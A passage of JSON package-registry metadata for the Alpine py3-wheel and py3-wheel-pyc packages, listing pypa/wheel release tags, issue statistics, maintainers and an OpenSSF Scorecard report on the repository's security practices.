ind":"commit","published_at":"2016-02-05T16:38:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.27.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0/manifests"},{"name":"0.26.0","sha":"acb3cf8177034c014cfe90a691a850b5322951b5","kind":"commit","published_at":"2015-09-18T18:04:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.26.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0/manifests"},{"name":"0.25.0","sha":"4b9fd6bf095c1b4427ed65ac19e4d5666a719f33","kind":"commit","published_at":"2015-09-17T00:34:49.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.25.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0/manifests"},{"name":"0.24.0","sha":"cd0935c4fe92a15ea83057a9357347ae8d6a138e","kind":"commit","published_at":"2014-07-06T16:56:09.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.24.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0/manifests"},{"name":"0.23.0","sha":"75c59f175c8cb2bfcb6660927232b40df1e149c4","kind":"commit","published_at":"2014-04-01T02:01:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.23.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0/manifests"},{"name":"0.22.0","sha":"f1cc0b8a8601040b864e1e784e160744c7e3d965","kind":"commit","published_at":"2013-09-15T20:45:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.22.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0/manifests"},{"name":"0.21.0","sha":"474826f4d64064e852b541f099fa69dcf5dd20fa","kind":"commit","published_at":"2013-07-20T16:19:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.21.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0/manifests"},{"name":"0.16.0","sha":"f65ab72e2c6b04d10a4153807f473c9e9af421d5","kind":"commit","published_at":"2013-04-30T01:46:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.16.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0/manifests"},{"name":"0.15.0","sha":"dffddb1d5af9e736fdd6192ca9256dc767bfab51","kind":"commit","published_at":"2012-11-16T14:06:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.15.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0/manifests"},{"name":"0.13.0","sha":"60fa189589155e43f33587f67eb44bb4fd7d5b58","kind":"commit","published_at":"2012-10-18T00:16:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.13.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0/manifests"},{"name":"0.12.0","sha":"2861596953a6ddfb2c4f052a46a2e2b4c5619245","kind":"commit","published_at":"2012-10-06T12:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.12.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0/manifests"},{"name":"0.11.0","sha":"8dd29d841e15596bc9b5d1c7f7576b2a66113f92","kind":"commit","published_at":"2012-10-06T12:18:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.11.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0/manifests"},{"name":"0.10.3","sha":"7021b0ee2a51e5d9447d06038db58e9e597625f7","kind":"commit","published_at":"2012-10-03T22:55:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3/manifests"},{"name":"0.10.2","sha":"126aaacc9f24fa69b6b74d4e742f645f6bb65cf3","kind":"commit","published_at":"2012-10-03T01:11:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2/manifests"},{"name":"0.10.1","sha":"92e52e6745ec6b1178c2f42585c2f37ab04902a8","kind":"commit","published_at":"2012-10-01T02:52:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1/manifests"},{"name":"0.10.0","sha":"9ee6da6d6cab3fa171f2704df5f934474acc4aae","kind":"commit","published_at":"2012-10-01T02:20:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0/manifests"},{"name":"0.9.7","sha":"a118f5845570ebaf6566b8075dc1dcaf117d7d43","kind":"commit","published_at":"2012-09-20T15:52:36.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7/manifests"},{"name":"0.9.6","sha":"0c4752551e4fa1d4e9786fc874ae97edf52c0369","kind":"commit","published_at":"2012-09-20T01:46:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6/manifests"},{"name":"0.9.4","sha":"8db2d0d4760a0886998e3fca4206f5db3230d223","kind":"commit","published_at":"2012-09-11T12:32:56.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4/manifests"},{"name":"0.9.3","sha":"ca65be72feaf5ebe92ef4c9e91bd722360c1ad2c","kind":"commit","published_at":"2012-09-11T02:38:10.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3/manifests"},{"name":"0.9.1","sha":"6952bc635deb0afdf36c5f325aa166636f1c2a52","kind":"commit","published_at":"2012-08-28T23:07:55.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1/manifests"},{"name":"0.9","sha":"49b1d5dac1cdeaf98998b1e5bdb0e2cf134edff3","kind":"commit","published_at":"2012-08-23T03:08:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9","html_url":"https://github.com/pypa/wheel/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9/manifests"},{"name":"0.7","sha":"b2930f5f5d3c898389bdbdd7c854a0b9d320cf14","kind":"commit","published_at":"2012-07-28T12:12:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7/manifests"},{"name":"0.6","sha":"bdf9d5747a724664bd3588ab471907a900b45c9a","kind":"commit","published_at":"2012-07-23T16:26:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6/manifests"},{"name":"0.5","sha":"d02f91dceda7c4a16cc26ea80f0eecfff638e4b2","kind":"commit","published_at":"2012-07-17T16:23:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5/manifests"}]},"repo_metadata_updated_at":"2025-10-30T04:12:44.277Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:apk/alpine/py3-wheel?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.22","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-wheel","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-wheel","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-wheel/dependencies","status":null,"funding_links":["https://github.com/sponsors/pypa"],"critical":null,"issue_metadata":{"last_synced_at":"2025-10-26T09:45:16.065Z","issues_count":109,"pull_requests_count":184,"avg_time_to_close_issue":48693272.43877551,"avg_time_to_close_pull_request":2636588.9515151517,"issues_closed_count":98,"pull_requests_closed_count":165,"pull_request_authors_count":37,"issue_authors_count":90,"avg_comments_per_issue":5.908256880733945,"avg_comments_per_pull_request":3.5217391304347827,"merged_pull_requests_count":140,"bot_issues_count":0,"bot_pull_requests_count":65,"past_year_issues_count":16,"past_year_pull_requests_count":34,"past_year_avg_time_to_close_issue":238596.63636363635,"past_year_avg_time_to_close_pull_request":890483.8846153846,"past_year_issues_closed_count":11,"past_year_pull_requests_closed_count":26,"past_year_pull_request_authors_count":11,"past_year_issue_authors_count":15,"past_year_avg_comments_per_issue":4.25,"past_year_avg_comments_per_pull_request":3.0588235294117645,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":8,"past_year_merged_pull_requests_count":23,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/issues","maintainers":[{"login":"jaraco","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"},{"login":"woodruffw","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/woodruffw"},{"login":"di","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/di"},{"login":"uranusjr","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/uranusjr"},{"login":"pradyunsg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pradyunsg"},{"login":"mayeut","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mayeut"},{"login":"alex","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alex"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/packages/py3-wheel/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/packages/py3-wheel/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/packages/py3-wheel/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/packages/py3-wheel/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/packages/py3-wheel/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/packages/py3-wheel/codemeta","maintainers":[{"uuid":"santurysim@gmail.com","login":null,"name":"Peter Shkenev","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Peter Shkenev","packages_count":106,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Peter Shkenev","role":null,"created_at":"2025-06-08T03:28:18.626Z","updated_at":"2025-06-08T03:28:18.626Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/maintainers/santurysim@gmail.com/packages"}],"registry":{"name":"alpine-v3.22","url":"https://pkgs.alpinelinux.org/packages?branch=v3.22","ecosystem":"alpine","default":false,"packages_count":26322,"maintainers_count":422,"namespaces_count":2,"keywords_count":4641,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":1728},"icon_url":"https://github.com/alpinelinux.png","created_at":"2025-06-05T10:49:56.987Z","updated_at":"2026-06-10T05:18:29.151Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/namespaces"}},{"id":11750501,"name":"py3-wheel-pyc","ecosystem":"alpine","description":"Precompiled Python bytecode for py3-wheel","homepage":"https://github.com/pypa/wheel","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":[],"namespace":"main","versions_count":2,"first_release_published_at":"2025-05-05T11:24:02.000Z","latest_release_published_at":"2026-03-03T22:20:29.000Z","latest_release_number":"0.46.3-r0","last_synced_at":"2026-03-13T00:48:37.077Z","created_at":"2025-06-07T12:03:23.576Z","updated_at":"2026-03-13T00:48:37.078Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.22/main/x86_64/py3-wheel-pyc","install_command":"apk add py3-wheel-pyc","documentation_url":null,"metadata":{"repository":"main","architecture":"x86_64"},"repo_metadata":{"id":23174547,"uuid":"98346885","full_name":"pypa/wheel","owner":"pypa","description":"The official binary distribution format for Python","archived":false,"fork":false,"pushed_at":"2025-10-06T19:13:50.000Z","size":1827,"stargazers_count":539,"open_issues_count":14,"forks_count":171,"subscribers_count":30,"default_branch":"main","last_synced_at":"2025-10-30T00:35:00.752Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pypa.png","metadata":{"files":{"readme":"README.rst","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2017-07-25T20:24:25.000Z","updated_at":"2025-10-29T13:00:22.000Z","dependencies_parsed_at":"2024-02-03T11:27:24.404Z","dependency_job_id":"c444d7cc-5eb9-412d-b647-9474b7b4096f","html_url":"https://github.com/pypa/wheel","commit_stats":{"total_commits":913,"total_committers":82,"mean_commits":"11.134146341463415","dds":0.6297918948521358,"last_synced_commit":"baf6bf89562cb42a0ca71cc1e804600b161952eb"},"previous_names":[],"tags_count":68,"template":false,"template_full_name":null,"purl":"pkg:github/pypa/wheel","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/sbom","scorecard":{"id":751706,"data":{"date":"2025-08-11","repo":{"name":"github.com/pypa/wheel","commit":"15b7577654e8bcd23e009c6bac036b65c11d8d8f"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5,"checks":[{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:50: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:52: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:56: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/publish.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:43","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:46","Info:   0 out of   7 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned","Info:   0 out of   4 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Maintained","score":1,"reason":"1 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Code-Review","score":2,"reason":"Found 8/27 approved changesets -- score normalized to 2","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/publish.yml:48","Warn: no topLevel permission defined: .github/workflows/publish.yml:1","Warn: no topLevel permission defined: .github/workflows/test.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.txt:0","Info: FSF or OSI recognized license: MIT License: LICENSE.txt:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/publish.yml:31"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":5,"reason":"SAST tool is not run on all commits -- score normalized to 5","details":["Warn: 6 commits out of 12 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code 